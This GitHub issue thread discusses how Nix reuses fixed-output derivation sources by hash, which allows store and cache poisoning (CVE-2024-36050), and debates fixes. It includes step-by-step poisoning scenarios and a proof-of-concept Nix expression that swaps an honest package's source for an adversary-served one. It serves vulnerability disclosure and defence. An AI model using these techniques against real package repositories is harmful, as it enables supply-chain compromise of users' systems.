Open magnetophon opened 8 years ago
In fixed-output derivations, the hash is content addressed. We could get URL to be part of the hash, but then mirror/url change would trigger a rebuild, which is very unfortunate.
I propose you change the workflow how you change sources, but I realize that's poor UX.
I want to better understand the "stuck with the wrong source" thing you mention because I haven't experienced it, but otherwise I'm basically with @domenkozar on this. I don't like the usability aspects either, but I don't know how to retain the nice content-centric properties without something like this.
One option, possibly more work than someone's willing to put into solving this, is for Nix to maintain a local cache of fixed-output derivation output hashes and the regular-derivation-style input hash that led to that output hash. This could be stored as a very simple "output-hash -> regular-derivation-hash" KV mapping. Then it could simply warn you that it's seeing the same output hash coming from a different derivation, which isn't necessarily an error but might be interesting to the user.
@domenkozar: Could you expand on "I propose you change the workflow how you change sources, but I realize that's poor UX."?
@copumpkin: What I mean is: nix wil write the old source in the store, under the new name.
It won't re-fetch it if you just change the hash; you have to remove the "old source under the new name" first.
@ the both of you: it seems this issue is not as easy to fix as I hoped. Feel free to close it if you want.
What I mean is: nix wil write the old source in the store, under the new name. It won't re-fetch it if you just change the hash; you have to remove the "old source under the new name" first.
I'm confused. The way Nix thinks about fixed-output derivations is as follows:
fetchurl
or the git repo specs for fetchgit
, and basically all the scripts that call git
or curl
or whatever are "hints" for how to produce the content in (1). If the content already exists, the scripts won't be run. If the content doesn't exist, and the script produces data with a different hash, Nix will complain that the hash doesn't match and quit.So here are the scenarios I can think of:
fetchurl
: Nix will fetch the original URL, check it against the new hash you changed, and complain that the hashes don't match.It sounds like you're saying (3) is leaving junk in the store that's identified with the new hash but contains the old data, but that doesn't fit with my understanding of how things work. What am I missing?
@copumpkin: I'm talking about when you change the version (or name in general) of the pkg and the url, but not the hash. afaik in that case it doesn't matter if the content is already in the store, it'll be stored under the new name.
Sorry for the confusion, hope I'm clear now.
I see the opposite in my tests:
Welcome to Nix version 1.11.2. Type :? for help.
nix-repl> let pkgs = import <nixpkgs> {}; in pkgs.fetchurl { url = "http://example.com/test.tar.gz"; sha256 = "0biw882fp1lmgs6kpxznp1v6758r7dg9x8iv5a06k0b82bcdsc53"; }
«derivation /blah/nix/store/9hj80g8r12q74wk6k0wq8zfi1bf6glgn-test.tar.gz.drv»
nix-repl> let pkgs = import <nixpkgs> {}; in pkgs.fetchurl { url = "http://example.org/test.tar.gz"; sha256 = "0biw882fp1lmgs6kpxznp1v6758r7dg9x8iv5a06k0b82bcdsc53"; }
«derivation /blah/nix/store/6zh44fbv7agc7n7il0wprzg6hv1khwha-test.tar.gz.drv»
nix-repl> let pkgs = import <nixpkgs> {}; in pkgs.stdenv.mkDerivation { name = "test"; src = pkgs.fetchurl { url = "http://example.com/test.tar.gz"; sha256 = "0biw882fp1lmgs6kpxznp1v6758r7dg9x8iv5a06k0b82bcdsc53"; }; }
«derivation /blah/nix/store/zbajq1zcsz90z8dnnfxfi5d1a36kk17l-test.drv»
nix-repl> let pkgs = import <nixpkgs> {}; in pkgs.stdenv.mkDerivation { name = "test"; src = pkgs.fetchurl { url = "http://example.org/test.tar.gz"; sha256 = "0biw882fp1lmgs6kpxznp1v6758r7dg9x8iv5a06k0b82bcdsc53"; }; }
«derivation /blah/nix/store/dvhk6cw4am7r9rgyjb1q7rwqdww6cns7-test.drv»
I would think that nix shouldn't care about url change as long as the hash stays the same. But in reality the change of the url gives me both redownload and (massive) rebuild.
@veprbl we're talking about the realized derivation hash, not the derivation hash itself.
@magnetophon
I was getting:
nix-store --delete /nix/store/sfzwi15fsd9wf7qv2rvxwpwr8wk9nkka-AntTweakBar-1.16
error: cannot delete path ‘/nix/store/sfzwi15fsd9wf7qv2rvxwpwr8wk9nkka-AntTweakBar-1.16’ since it is still alive
I run:
nix-store -q --roots /nix/store/sfzwi15fsd9wf7qv2rvxwpwr8wk9nkka-AntTweakBar-1.16
And deleted the results folder mentioned by previous command.
After that nix-build picked up the hanged URL.
I marked this as stale due to inactivity. → More info
I marked this as stale due to inactivity. → More info
To remove the stale label, just leave a new comment.
I was thinking, would it make sense to add an option like --force-redownload
that would try to redownload the source of the currently built package, and double check if the hash corresponds? It could help people to quickly check if the hash in a derivation is correct. (EDIT: actually, I think the current behavior brings some security issues, let me test it first)
One option, possibly more work than someone's willing to put into solving this, is for Nix to maintain a local cache of fixed-output derivation output hashes and the regular-derivation-style input hash that led to that output hash.
doesn't nix already track this for garbage collection purposes? nix-store -q --deriver
and nix-store -q --valid-derivers
should give you enough information to triangulate this.
I can confirm that this bug can lead to some security issues, described in an email sent to the security team (I'll likely create a public issue soonish). Other potential attacks (if other functionalities like cache sharing between Ofborg and reviewers/hydra is implemented) are described in https://github.com/NixOS/ofborg/issues/68#issuecomment-2083351493
What I propose to solve this is to keep on each nix installation a map URL -> hash
(or rather, as suggested by Linus in a private email, a map derivation -> hash
since fixed-output derivations might be much more general than downloading a file). For any fixed-output derivation, if hash
is already present on the system, it should first check if the url/derivation is also contained in the database with the appropriate hash. If not, it should re-execute the derivation, check if the hash is correct, and if so continue from the cached value.
EDIT: See my proposition here https://github.com/NixOS/ofborg/issues/68#issuecomment-2085327052 for a more robust version
@tobiasBora
After @risicle pointed me your way in https://github.com/NixOS/rfcs/pull/171#issuecomment-2095639253, and after reading your comments in https://github.com/NixOS/ofborg/issues/68 I came up with a very simple currently undetectable way to poison Hydra's cache in https://github.com/NixOS/rfcs/pull/171#issuecomment-2096283938:
But now thinking about this, I have an IMHO much simpler and thus scarier attack that will work against Hydra:
- Malice makes an evil PR with a package update that changes the source's revision to a new version but points the hash to a hash of an older version of the same package, a version which has a well-known CVE.
- A very paranoid Nixpkgs maintainer Alice (who does not use any build caches) looks at it, it looks fine, so she builds it, and it works fine, since Alice has the older version of the source in
/nix/store
, and so she merges it.- All tools that track unfixed CVEs in Nixpkgs only look at package versions, so those will be fooled too.
- Malice can now exploit the CVE.
So, this is actually a critical bug.
Merging https://github.com/NixOS/nixpkgs/pull/49862, setting nameSourcesPrettily = true
or nameSourcesPrettily = "full"
by default, and banning of customly-named source derivations is a workaround that will work in the meantime.
Yes, I actually realized exactly this morning this issue with fetchzip
and transmitted a MWE to the security team showing that one can use the code of any package controlled by an adversary to inject code into any another package, exploiting the fact that fetchzip removes the package name & version in the attribute name, making the attack trivial to carry: the difference between a malicious & honest derivation is juts one hash.
As a result, I submitted a CVE online.
Patching fetchzip as discussed in https://github.com/NixOS/rfcs/pull/171 is only a first step but does not stop the slightly more involved cache poisoning attacks. The only robust fix I can think of is what I am proposing in https://github.com/NixOS/ofborg/issues/68#issuecomment-2085327052
Merging NixOS/nixpkgs#49862, setting
nameSourcesPrettily = true
ornameSourcesPrettily = "full"
by default, and banning of customly-named source derivations is a workaround that will work in the meantime.
That might be a first quick mitigation (actually not needed if we implement https://github.com/NixOS/ofborg/issues/68#issuecomment-2085327052), but not something sufficient. Nobody would realize if a derivation is misnamed, for instance in a long "automatically generating" file.
The only robust fix I can think of is what I am proposing in https://github.com/NixOS/ofborg/issues/68#issuecomment-2085327052
While your algorithm will work if you trust Hydra to do the right thing and check all fixed-output outputs, the problem is that ATM Hydra won't do it because Nix does not do it.
I.e. you are trying to prevent poisoning of your local /nix/store
with an unrelated output substituted from a binary cache, but, as I pointed out above, the attacker can trivially poison your (and Hydra's) /nix/store
directly too by reusing old hashes.
Merging https://github.com/NixOS/nixpkgs/pull/49862, setting
nameSourcesPrettily = true
ornameSourcesPrettily = "full"
by default
is one work-around for this.
As hinted in https://github.com/NixOS/rfcs/pull/171#issuecomment-2082993487, making nix-store -r --check
semantics slightly more convenient:
outPath
is valid it should build the derivation again and check the result matches the previously known output exactly (as it does now),outPath
is not valid, it should just build the derivation twice and compare the results (the current semantics of failing in this case is surprising and inconvenient),outPath
validity, it should always do the build and then check the hash,and then making OfBorg always run nix-store -r --check
for all affected fixed-output derivations, thus limiting the set of attackers who could poison caches and /nix/store
s to those who have direct commit access to Nixpkgs, is another work-around for this.
But the actual solution is to never reuse outputs between derivations without checking them first, i.e. Nix should remember a mapping of outPath -> set<drvPath>
for each valid outPath
in /nix/store
(ATM Nix only stores one drvPath
for each valid outPath
, aka nix-store -q --deriver
) and nix-store -r
should force re-build (i.e. --check
) each given derivation even if the corresponding outPath
already exists and is valid in /nix/store
in cases when that outPath
does not have that drvPath
in its set<drvPath>
yet.
In other words, /nix/store
path validity should be changed from being a flag ("is valid") to a predicate ("is valid as an output for this drvPath
).
Similarly, substitutors should provide their set<drvPath>
for each requested outPath
to the client Nix'es (somehow) and a client Nix should check those before accepting a substitution.
Obviously, without any optimizations that would be incredibly inconvenient, as, among other things, not only changes to URLs and changes between fetch*
functions would always cause a rebuild, but also any unrelated changes to stdenv.mkDerivation
would cause all derivations using any of the fetch*
functions to be rebuilt too.
One possible way to minimize rebuilds in this case is to implement a tiny mkDerivationLite
variant of stdenv.mkDerivationLite
and use that in all fetch*
functions. Sure, updating curl
or git
will still cause a lot of rebuilds, but for the paranoid this could be a good thing: after all, what if the attacker poisoned one of those somehow.
Another way to reduce rebuilds with drvPath
-predicated-validity is to add a new outputPathToken
parameter to derivation
which would declare to Nix that the outPath
of this derivation is valid for any other derivation that maps to the same outPath
and uses the same outputPathToken
, i.e. it would declare an equivalence class of valid drvPath
s for each outPath
(i.e., in the above, set<drvPath>
becomes set<drvPath or outputPathToken>
).
Then,
outputPathToken
to some constant,outputPathToken
always unset will get you the most paranoid behavior at the cost of most rebuilds,outputPathToken
to different things in different fetch*
derivations, e.g.
outputPathToken
to the "fetchurl " + concatSepBy " " (sort urls)
in fetchurl
so that changes to URLs would cause rebuilds,"fetchgit " + url + " rev " + rev
in fetchgit
so that changes to URLs and revisions would also cause rebuilds,nix.conf
could then provide an option to ignore all outputPathToken
options, for the most paranoid.
I've to admit I don't yet fully grasp all your proposition, but here are a few comments after a first reading:
While your algorithm will work if you trust Hydra to do the right thing and check all fixed-output outputs, the problem is that ATM Hydra won't do it because Nix does not do it.
Well, I precisely want nix to implement it. All other solutions would either not work or require the user to do massive downloads (if the data don't exist, you have no other way than regenerating it yourself) to check all FOD, which can lead to many issues. Not only the user would need to download the (transitive) sources of all packages they want to install, even if they only care about the final binary, by if the source is not available anymore at its current location then the user would not even be able to install the binary (and the security team mentioned me that they don't want to go this path as it used to be this way and created many issues).
I.e. you are trying to prevent poisoning of your local
/nix/store
with an unrelated output substituted from a binary cache, but, as I pointed out above, the attacker can trivially poison your (and Hydra's)/nix/store
directly too by reusing old hashes.
If one changes nix the way I propose, I don't see how anyone could poison Hydra's cache (of course if we trust Hydra itself… but one anyway already needs to trust Hydra for many other reasons). The new derivation -> hash
map is precisely used to say "Hydra checked that this FOD derivation
evaluates to hash
", i.e. "no poisoning has been done on this derivation". In particular, old hashes would NOT be part of this trusted map until Hydra checks that they are indeed correct.
setting
nameSourcesPrettily = true
ornameSourcesPrettily = "full"
by default is one work-around for this.
I don't see it as a true work-around. This makes a very particular attack (downgrading) harder, but there are many other ways to pollute a cache, for instance by adding (e.g. a few months in advance to be sure it is in Hydra' cache) a malicious dependency in some automatically generated files with the name & version of the program to attack.
Nix should remember a mapping of
outPath -> set<drvPath>
for each validoutPath
in/nix/store
I think this is more or less what I proposed, just the maps is in the other way around as I was proposing instead drvPath -> outPath
& I also propose to let cache.nixos.org/… share this map.
One possible way to minimize rebuilds […]
What do you call a rebuild here? Is it in the sense that:
drvPath -> outPath
(which indeed should be done by hydra if the fetch*
function change, and I guess having a lite version of mkDerivation
makes sense if these often change)drvPath -> outPath
I was proposing above(of course if we trust Hydra itself… but one anyway already needs to trust Hydra for many other reasons)
What reasons? If I'm not using the Hydra binary cache and I'm not using the default bootstrap tarballs what is there to trust? Tarballs downloaded from Hydra tarball cache get hashed and checked against hashes in their derivations locally, as they should.
I don't see it as a true work-around. This makes a very particular attack (downgrading) harder, but there are many other ways to pollute a cache, for instance by adding (e.g. a few months in advance to be sure it is in Hydra' cache) a malicious dependency in some automatically generated files with the name & version of the program to attack.
Putting the whole revision or hash into the source derivation name and banning of customly-named fetch*
derivations will make that attack impossible.
But even without the first part (and with <hash>-<name>-<version or short revision>-source
scheme), sure, in theory, the attacker could still poison it by pre-fetch*
ing an evil source in an autogenerated files with the same derivation name if the attacker manages guess a version number (or the prefix of the revision) with a CVE they could attack in advance.
So... almost never.
And then, users like me, that do not build anything from those huge autogenerated files and are not using Hydra binary cache will catch those mis-hashes immediately.
I'm running with https://github.com/NixOS/nixpkgs/pull/49862 and nameSourcesPrettily = "full"
enabled since 2018 (essentially, implementation details changed over time, but the behavior did not).
Do I use a small subset of Nixpkgs? Yes. Do source URLs still fail to fetch sometimes? Yes.
But usually things are pretty easy to fix, and older source versions usually can be found on archive servers without changes to any hashes.
But now, remembering the uncountable number of times I had to fix fixed-output hashes locally to make my systems build I'm feeling kind of paranoid. Were all those outputs mis-hashed in honest error or were some of them attempts to poison something?
Some of those mis-hashes persisted for months in master
while I was too annoyed with the PR process, thinking them honest errors that would be fixed eventually by people with direct commit access.
Was something poisoned already?
... implementation ...
I think this is more or less what I proposed, just the maps is in the other way around as I was proposing instead
drvPath -> outPath
& I also propose to let cache.nixos.org/… share this map.
Yes, algorithmically, we are proposing the same thing, but I'm essentially proposing we reuse the existing Nix derivers mechanism for this and while you are talking about how to make Hydra publish its derivers and make Nix use them, I'm pointing out that Hydra publishing its derivers is not enough: if Hydra does not have the output in its cache yet, then the user will have to --fallback
build locally, meaning local Nix will have to do the check too, which means checking that the source derivation is in checked derivers set of that output, which would frequently fail, which would mean frequent mass rebuilds, and so I'm proposing a way to minimize those, and outputPathToken
is a clever and simple solution, IMHO.
Precise formats of outputPathToken
for different fetch*
ers and their security implications could and should be discussed.
One possible way to minimize rebuilds […]
What do you call a rebuild here? Is it in the sense that:
- the FOD output should be re-checked by Hydra, to complete the map
drvPath -> outPath
(which indeed should be done by hydra if thefetch*
function change, and I guess having a lite version ofmkDerivation
makes sense if these often change)
I.e., in the terminology I use in my proposal, you are stating that Nix should ask its substitutors for their derivers set for the outPath
it tries to substitute and then check that source derivation is in that set. To which I agree.
- the FOD output should be re-checked by the end user: this should NOT be the case, at least if hydra already did it before and if we implement the sharing of
drvPath -> outPath
I was proposing above
Sure, if substitutors are enabled, then Nix should only do "member in a set" check, not a full derivation rebuild (i.e. nix-store -r --check
, which is what I call a "rebuild", because nix build --rebuild
does it).
- the whole world should be rebuilt: this should NOT be the case, once the user is assured that the hash is correct they can use the old derivation as before.
But if the user does not use Hydra, and curl
changed, and the user is feeling sufficiently paranoid, I would think having a way to re-check everything would be a good thing.
What reasons?
Anyone relying on cache.nixos.org
(which is likely 99% of users) need to trust Hydra, as if it can always inject malicious code inside the final binary… Like Debian users need to trust Debian maintainers. And I don't see how checking the hash can help here, programs are not FOD and their hash may vary across builds in general, so until we have succinct verifiable honest proof of compilation (which, let's be honest, is never going to happen) or at least 100% reproducible builds, we need to trust hydra.
Anyway, the attack I describe would also apply to people NOT using hydra, so building everything from source will not help since it will pick the wrong source.
If the attacker manages guess a version number (or the prefix of the revision) with a CVE they could attack in advance. So... almost never.
I think you misunderstand the attack I have in mind. What I describe allows any adversary to inject arbitrarily malicious code (irrespective of the fact of whether the actual program will have a CVE or not) in a future release of any program, assuming they can simply guess the name of the release… which is trivial (these usually simply increase one by one and are often pre-released in an alpha form like 3.42-alpha
.
But now, remembering the uncountable number of times I had to fix fixed-output hashes locally
Is it really an experience we want for nix end users?
Was something poisoned already?
Hard to say. I tried to do a quick check in Nixpkgs by looking at duplicated hashes (but it is possible to apply a different attack so that this does not appear that clearly). The number of duplicated hashes is quite large so I used a script to help me to discard the good looking ones, but most of them seem quite honest. Only two physics programs (in pkgs/by-name) were sharing the same hash while having very different names… but I had no time to investigate further.
which would mean frequent mass rebuilds
I don't see why we would get more rebuilds than now. If a program is in the cache, Hydra already downloaded its source, so the user can rely on Hydra's map. If Hydra has not built the package yet… anyway the user needs to rebuild everything. And if the package is a "legacy package" in the sense that it was built by Hydra before we even started to add this option, what I propose (maybe what you propose as well, not sure to understand all details) allows the user to only download & check the source while using the binary compiled by Hydra (which saves most of the time-consuming part).
Precise formats of
outputPathToken
for differentfetch*
ers and their security implications could and should be discussed.
I'm not sure to understand all details of your proposition here (maybe because I lack some knowledge of nix's internals) but I think I get the big picture. I think creating equivalent classes of derivations (which, I think, could be a nice concept in general in nix) could be a nice way to limit rebuilds in case of curl updates… but your implementation with outputPathToken
raises a number of questions, including in term of security:
outputPathToken
? If any derivation & fetcher can set this option (as it is the case for now as I understand it), this provides basically no additional security as the attacker could always submit an obfuscated FOD that sets outputPathTokens
to the one used in fetchgit
/… So for this to work outputPathToken
must be added by a new mechanism in nix, and not via the usual derivation.outputPathToken
should be an indication of the fetcher, but nix should provide command line options to follow or not these recommendations from the fetcher (either in a more or less paranoid way)outputPathToken
alone is not sufficient as it does not assert that the hash is correct. Notably, if I try to execute a derivation, and realize that the provided hash is not correct, one MUST REMOVE this derivation from /nix/store
, otherwise we will have no way of knowing if a derivation really evaluates to a given hash.So based on the first point, since it seems hard to only allow specify fetchers to create a given outputPathToken
(unless you know some special tricks?), and since anyway a new nix concept must be introduced, we can maybe deal with this by creating a new kind of derivation that specifies what must be downloaded and not how to obtain it as it is the case for now. For instance, one could create a derivation like:
Derive([
"kind": "fetchurl",
"url": "myurl",
"out": "/nix/store/foo.tar.xz",
"sha256", "somehash"
])
and nix should automatically understand that when receiving this derivation, it should download the url, using any CURL version they want as soon as the hash matches at the end. If we don't want to hardcode all of them in nix itself (let's try to keep nix small), we can let nix take as input a special nix file trusted-fetchers.nix
containing all the "trusted fetchers". This could be a map like kind -> fetcher
, such that when nix encounters a custom derivation they are not able to evaluate, nix would resort instead to using the fetcher in the map. This means that we only need to check trusted-fetchers.nix
instead of nixpkgs in its totality.
More specifically, fetcher
could be a function taking as input the above derivation, and outputting a bit Ok/Not ok (and possibly an error message) and a folder, such that the folder is kept in out
by nix iff the bit is true (this bit would be intuitively like "I checked that the hash is correct").
This idea of equivalence of fetchers can certainly be used to also solve other issues with non-deterministic processes. For instance, for now we have no solutions to avoid hash shift with leaveDotGit = true;
: https://github.com/NixOS/nixpkgs/issues/8567 and certainly many other package-manager things. One option here would be to create a derivation:
Derive([
"kind": "fetchgit",
"url": "git repo",
"leaveDotGit": true,
"out": "/nix/store/foo.tar.xz",
"sha256", "somehash"
])
where the hash only corresponds to the "stable" part of the package, i.e. what is outside .git
. The fetcher would then run git clone
to clone the package, compute the hash of the "valid" part, and output "OK" if this hash is valid.
But if the user does not use Hydra, and
curl
changed, and the user is feeling sufficiently paranoid, I would think having a way to re-check everything would be a good thing.
Well, checking the source, I agree it's nice to have… but no need to recompile programs.
Well, checking the source, I agree it's nice to have… but no need to recompile programs.
Most of my mentions of "rebuild" above imply the context of "rebuild the source (<name>.src
) derivation".
Package derivations (<name>
) should not be rebuilt, of course.
What reasons?
Anyone relying on
cache.nixos.org
(which is likely 99% of users) need to trust Hydra... ... Anyway, the attack I describe would also apply to people NOT using hydra, so building everything from source will not help since it will pick the wrong source.
My point exactly.
Some users have personal and/or shared build machines, and /nix/store
s on those can be poisoned too.
So the solution can not be "check derivers on Hydra and/or other configured binary caches", it has to be a general thing.
If the attacker manages guess a version number (or the prefix of the revision) with a CVE they could attack in advance. So... almost never.
I think you misunderstand the attack I have in mind. ...
I'm referencing the exploit described in https://github.com/NixOS/nix/issues/969#issuecomment-2096302974 there.
But now, remembering the uncountable number of times I had to fix fixed-output hashes locally
Is it really an experience we want for nix end users?
Well, those hashes are factually wrong, either in honest error, on in malice.
That's just the reality of the situation.
If Hydra or OfBorg verified them all, then those packages would have been fixed in master
instead of in my local branches.
which would mean frequent mass rebuilds
I don't see why we would get more rebuilds than now.
In the context I discuss there, say curl
changes, now all <name>.src
derivations that use fetchurl
have to be rebuilt.
Precise formats of
outputPathToken
for differentfetch*
ers and their security implications could and should be discussed.... trusted fetchers ...
Hmm, that's a good point. Specifically, yes, outputPathToken
s is probably not a good solution when the attacker can also modify the fetch*
derivations themselves, so it would at the very least still leave OfBorg vulnerable.
Derive([("out", "/nix/store/foo.tar.xz", "sha256", "somehash")], [ "kind": "fetchurl", "url": "myurl", ])
Making full-featured curl
into a Nix builtin is a possibility (as opposed to fetchurlBoot
that exists now), but what about derivations fetched with curl
and then unpacked with zip
(like fetchFromGitHub
)? Should zip
be a builtin too? What about those fetched with git
?
Even if it's just curl
and zip
, you'd have also make Nix depend on SSL CA's to verify HTTPS certs, otherwise the hashes could be poisoned on your developer machine by MITMing your Nix HTTP traffic, and ca-certs derivation is also non-trivial.
Also, at the moment Nix built with all the optional things disabled is pretty small and can be used for minimal self-bootstrap, requiring all those things will make things harder.
So: Is it possible to do? Yes. Is it a desirable solution? Probably not.
Was something poisoned already?
Hard to say. I tried to do a quick check in Nixpkgs by looking at duplicated hashes (but it is possible to apply a different attack so that this does not appear that clearly). The number of duplicated hashes is quite large so I used a script to help me to discard the good looking ones, but most of them seem quite honest. Only two physics programs (in pkgs/by-name) were sharing the same hash while having very different names… but I had no time to investigate further.
How are you doing this, exactly? Are you parsing Nix files by hand?
nix-env -f ./default.nix -qa --argstr system "x86_64-linux" --attr-path --drv-path --out-path
gives the output that has the right data (after all, we need to check that different --attr-path
s don't reuse or downgrade --out-path
s), but it only evaluates package derivations, not source derivations.
If it did, running that on successive revisions of Nixpkgs, parsing the outputs, building a DB from the results, and then printing --out-path
reuses and downgrades would be a good first step.
(Expensive to do, though. Especially since I don't have enough memory to evaluate all of Nixpkgs in a single run of nix-env -qa
already, and evaluating a subset is kinda useless, given that any of the autogenerated package sets can be poisoned.)
I guess, the simplest way to do this, cheaper than doing nix-env -qaP
followed by nix-instantiate -A
on all --attr-path
s, and then nix-store -q --requisites
, followed by parsing the .drv
files manually (which would be crazy expensive to do and will also torture your SSD) would be implementing nix-env -q --all
option so that nix-env -f ./default.nix -q --all --argstr system "x86_64-linux" --attr-path --drv-path --out-path
would print that data for all derivation
s Nix encounters while doing evaluations, not only the ones --available
from the current Nix expression.
My ability to patch Nix sources is fairly superficial ATM and I don't really care for this much, given that https://github.com/NixOS/nixpkgs/pull/49862 with a small custom-name-warning change on top basically solves the problem for me (given that I don't use Hydra).
But it would be nice if someone could implement that nix-env -q --all
and then possibly somebody else would share all those evaluations on a bunch of revisions of master
, so that we could check if Hydra and all users using it were PWNed yet.
This issue has been mentioned on NixOS Discourse. There might be relevant details there:
https://discourse.nixos.org/t/nixpkgs-supply-chain-security-project/34345/19
I'm not sure why my last answer has not been posted. In the meantime the CVE got published at https://nvd.nist.gov/vuln/detail/CVE-2024-36050
Package derivations (
<name>
) should not be rebuilt, of course.
Good, just wanted to be sure we are on the same basis.
So the solution can not be "check derivers on Hydra and/or other configured binary caches", it has to be a general thing.
Definitely agree. My point was just to try to reduce the amount of downloaded materials from the user perspective using the cache when available, otherwise users (especially those with little bandwith) would suffer a lot, and if the source is changed they would get 404 error even if it is still cached.
I'm referencing the exploit described in #969 (comment) there.
I show here a much more generic attack https://github.com/leo-colisson/CVE_NixOs_cache_spoil/ with some variants using fetchurl
instead of fetchzip
etc. For instance, this:
{ pkgs ? import <nixpkgs> {} }:
pkgs.callPackage ({stdenv, fetchzip}:
let iconpackage = stdenv.mkDerivation rec {
pname = "iconpackage";
version = "42.0";
src = fetchzip {
url = "http://localhost:8042/iconpackage-${version}.tar.gz"; # <-- this is controlled by the adversary
sha256 = "sha256-kACAk1+Se9vaJN8FkqLRJsOI7szD9zw015nCxxT54bs=";
};
buildPhase = ":";
installPhase = ''
mkdir -p $out/share/icons/hicolor/64x64/apps/
mv myicon.png $out/share/icons/hicolor/64x64/apps/
'';
};
honestpackage = stdenv.mkDerivation rec {
pname = "honestpackage";
version = "1.0";
src = fetchzip {
url = "http://localhost:8042/honestpackage-${version}.tar.gz"; # <-- this is NOT controlled by the adversary
sha256 = "sha256-kACAk1+Se9vaJN8FkqLRJsOI7szD9zw015nCxxT54bs=";
};
buildInputs = [ iconpackage ];
buildPhase = ":";
installPhase = ''
mkdir -p $out/bin
mv honestpackage.sh $out/bin
'';
};
in honestpackage
) {}
Would result in:
$ nix-build
$ ./result/bin/honestpackage
I am malicious >:-|
In the context I discuss there, say
curl
changes, now all<name>.src
derivations that usefetchurl
have to be rebuilt.
Yeah I see now, hence my proposition to have trusted fetchers.
Specifically, yes,
outputPathToken
s is probably not a good solution when the attacker can also modify thefetch*
derivations themselve
Well, they can always do that, for instance by implementing their own FOD derivation, without even relying on a pre-existing fetch*
at all.
Making full-featured
curl
into a Nix builtin is a possibility (as opposed tofetchurlBoot
that exists now), but what about derivations fetched withcurl
and then unpacked withzip
[…] Is it possible to do? Yes. Is it a desirable solution? Probably not.
That's precisely why I don't want to include this in Nix directly, but provide to nix a trusted-fetcher.nix
file via a command line like $ nix --trusted-fetchers trusted-fetchers.nix
or simply by picking this file automatically by default. One needs to think carefully about this file, but after a quick thought, it could look like:
{pkgs, ...}: {
"fetchurl" = {
args = [ "url" ];
script = "
${pkgs.curl}/bin/curl "$url" -O $tmpOut
${pkgs.sha256sum}/bin/sha256sum $tmpOut > $tmpOutSha
";
};
}
This way, when a user calls fetchurl { url = "https://foo.com"; hash = "somehash"; }
it would create a derivation like:
Derivation({
"trustedFetcher": "fetchurl",
"url": "https://foo.com",
"hash": "somehash"
})
(see that it is agnostic of curl
's version), and to execute it, nix would pick the appropriate fetcher in trusted-fetchers.nix
(unless it is already present in the cache), run the corresponding script, and compare at the end the content of $tmpOutSha
with the hash in the derivation. If they match, the it derives from the hash
of the derivation the final $out
and copies $tmpOut
to this path.
How are you doing this, exactly? Are you parsing Nix files by hand?
Right now this is made in a very dirty way, via a simple grep (install ripgrep
):
import subprocess
import os
import re
for line in os.popen("rg -o 'hash = \".*\"' --no-filename | sort | uniq -c | sort -hr | rg -v \"1 hash\" | rg -o '\".*\"'").readlines():
print(f"==={line}")
output = os.popen(f"rg -F '{line.strip()}' -C 5").read()
res = re.findall(r'owner ?= ?"[^"]*"', output)
if res and len(res) - len(set(res)) > 0:
print("The owner appears twice, sounds good enough here")
continue
res = re.findall(r'url ?= ?"[^"]*"', output)
if res and len(res) - len(set(res)) > 0:
print("The url appears twice, sounds good enough here")
continue
print(output)
print("===================================================================\n\n\n")
You can see that the number of duplicated hashes is quite large (155), so I try to discard some of them automatically, for instance if I see the same url twice around the good lines, but this is very dirty, and I don't consider this as any good security measure. Even with this sorting there is quite a lot of entries to manually read, so it would be better to actually extract all such fetch*
, and try to run them (without using the local cache of course, not sure how to do) and see if the hash is actually correct…
Currently the source is only re-fetched when the hash changes. When you use
nix-env -i
to find the new hash, but forget to make a change to the hash, you are stuck with the wrong source.To add injure to insult: the source is then not re-fetched when you change the hash: you first have to garbage-collect the old source.